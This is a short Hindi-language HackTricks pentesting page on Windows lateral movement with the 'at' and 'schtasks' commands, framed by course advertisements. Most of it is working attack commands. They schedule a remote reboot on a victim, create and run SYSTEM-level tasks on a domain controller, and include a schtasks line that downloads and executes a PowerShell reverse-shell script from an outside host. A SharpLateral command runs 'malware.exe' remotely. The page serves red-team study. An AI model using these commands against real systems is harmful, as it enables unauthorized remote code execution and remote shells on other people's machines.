AtExec / SchtasksExec

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

काम कैसे करता है

At उन होस्टों में कार्यों को निर्धारित करने की अनुमति देता है जहां आपको उपयोगकर्ता नाम/(पासवर्ड/हैश) पता है। इसलिए, आप इसका उपयोग करके दूसरे होस्टों में कमांड निष्पादित कर सकते हैं और आउटपुट प्राप्त कर सकते हैं।

At \\victim 11:00:00PM shutdown -r

स्क्टास्क का उपयोग करके आपको पहले कार्य बनाना होगा और फिर इसे बुलाना होगा:

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

आप भी SharpLateral का उपयोग कर सकते हैं:

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

और अधिक जानकारी सिल्वर टिकट के साथ schtasks का उपयोग यहाँ

जीरो से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated